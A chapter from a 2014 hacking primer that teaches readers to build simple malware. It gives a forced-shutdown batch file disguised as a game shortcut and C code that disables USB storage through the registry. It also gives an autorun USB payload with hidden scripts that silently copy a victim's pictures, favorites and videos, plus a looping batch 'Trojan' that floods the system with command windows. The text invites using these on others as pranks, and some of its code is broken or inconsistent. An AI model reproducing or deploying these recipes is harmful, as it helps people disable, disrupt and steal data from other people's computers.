Creating virus - A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

Chapter 3. Creating virus

We will cover :

* Building your first virus file

* Creating a virus to disable USB ports

* Virus nested in the stick

* Getting started with Trojan

* Make a simple Trojan virus

Virus is the key for making a hacker’s dream come true in many ways.

In the last chapter we spoke a little about virus, but in this chapter

we will cover more about it and in the end you will understand how to make one and how it operates.

Building your first virus file

Here you will create your first virus using Notepad. The virus that we will be creating task is to shut down the operating system and will be cloaked in a game icon. Give this virus to someone who can handle this prank.

1. Start by opening notepad for the texting .Start->All Programs->Accessories->Notepad

2. Type this piece of code in notepad:

@echo off

echo Message here.

shutdown -s -f -t 60 -c "type a message you want to appear here

3. Save the file as “play this 3D game.bat”, change the “Save file type:” when saving to “All Files”. And then save. (see Figure 3-1)

In Figure 3-1 .shows you notepad Save Dialog opened and file type changed.

4. Go to the desktop and create a new shortcut, locate for the bat file then next.

5. Name it “play this 3D game” and finish.

6. Right click the shortcut->properties->Change Icon->choose one then OK.

Here the fake game App we created should be a virus that shutdowns the user’s PC in a few seconds. And that’s how you created your very first virus by just using Notepad.

Creating a virus to disable USB ports

Your second virus you will need to create is to disable all USB ports of the computer. Here you will need to compile a C file into an executable one. Meaning you will need to convert the .c into a .exe file.

Setting up Borland C++

1. First off you need to download Borland C++ 5.5 or above.

2. After you install Borland C++ compiler, create two new Text Documents in Notepad.

3. Type this in the first txt file these first two lines:

-I”c:\Borland\Bcc55\include”

-L”c:\Borland\Bcc55\lib”

4. Save changes and close the file. Now rename the first file to bcc32.cfg.

5. In the second text file document type this:

-L”c:\Borland\Bcc55\lib”

6. Save changes and close the file. Now rename the first file ilink32.cfg.

7. Put the two files in this directory: C:\Borland\BCC55\Bin

Creating the C file that blocks usb ports

1. Open notepad and type code and save it as “block_usb.c”

#include<stdio.h>

void main()

{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");

2. Place the file in C:\Borland\BCC55\Bin

3. Now open command prompt(Start->Run->type cmd)

4. Type in:

cd C:\Borland\BCC55\Bin

5. Now compile the file by typing:

bcc32 block_usb.c

Creating virus that unblocks the USB ports.

Now that your done you should have an block_usb.exe file in the folder that hopefully blocks all the USB ports.

1. To enable all the USB ports back again you should replace this code in the “block_usb.c” file and compile again:

#include<stdio.h>

void main()

{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");}

Virus nested in the stick

All the time I see virus launching from a stick and start infecting the computer. That I find really lame. What if you can make a virus launch from the stick and make it copy files to the stick silently? Wont that be more useful? Well today I’ll show you how to make one of those.

1. Insert you usb in the computer and navigate in it.

2. Create an empty text file in the root folder of the stick and once your done lunch it. Type this code:

[autorun]

icon=drive.ico

open=launch.bat

action=Are you sure you want to run the game for windows?

shell\open\command=launch.bat

3. Ok that’s it, save the file with a .inf extention

4. Choose an appealing icon for the file and that’s it.

5. Create another text file and in it and type this:

@echo off

:: variables

/min

SET odrive=%odrive:~0,2%

set backupcmd=xcopy /s /c /d /e /h /i /r /y

echo off

%backupcmd% "%USERPROFILE%\pictures" "%drive%\backup\My pics"

%backupcmd% "%USERPROFILE%\Favorites" "%drive%\ backup \Favorites"

%backupcmd% "%USERPROFILE%\videos" "%drive%\ backup \vids"

@echo off

cls

6. When you’re done save it as something but give it the extension .bat

7. We are almost done. Open another empty text file and type this:

CreateObject("Wscript.Shell").Run """" &

WScript.Arguments(0) & """", 0, False

8. Give the file a name I did “hidden” and save it with the extension .vps

9. Now this is the last step. Like always create & open a text file and type this:

wscript.exe \invisible.vbs file.bat

10. When you’re done save the file as “initiate” with the extension .bat

11. Last but not least create a folder in the stick next to the other files and name it “backup”

12. Now it should be done. Pull out the stick from the computer and insert it again and the autoplay window should pop-up. Then click on run. (see Figure 5-8)

In Figure 5-8 .shows you how the script is running in the terminal.

Note: It might give you an error message but that’s ok all the files where copied to the folder or they are being copied.

Getting started with Trojan

Most of us might think, or some that a Trojan is a virus, but it’s not. Trojan is just like any other program also called Malware. But that performs malicious functions such as creating damage to the computer. They do not have the ability to replicate themselves like virus. But with a Trojan you can control a computer remotely and execute virus in the computer.

These actions can include:

* Delete Data

* Blocking Data

* Modifying Data

* Copying Data

* Disrupting the performance of computers or computer networks

Trojan backdoor

A Backdoor Trojan gives malicious users remote control over the infected computer. They enable the author to do anything they wish on the infected computer – including sending, receiving, launching, and deleting files, displaying data, and shutdown the computer.

Make a simple Trojan Horse

Now we will create a Trojan virus that keeps opening command prompt 40x to 1000x times, depends on how much you type “start”. The user can’t easily stop them from opening. But if they have an antivirus the virus file can be detected.

1. Open notepad write “start” 50 x times or much more then save test.bat and test it in virtual box.

2. Make sure you don’t have an antivirus in the virtual box operating system. Now your antivirus should detect this bat file. If not this could fill the users memory.

@echo off

A

Start

Start

Start

Start

Start

Start

Start

goto a

Small summary ahead

* There are those virus that can be used to shut down a computer

* Virus can be used to disable USB ports

* Trojan is not a virus but a program that performs maliciously

* Backdoor are Trojan that have control on the user remotely

* Virus can be used to transfer files to the stick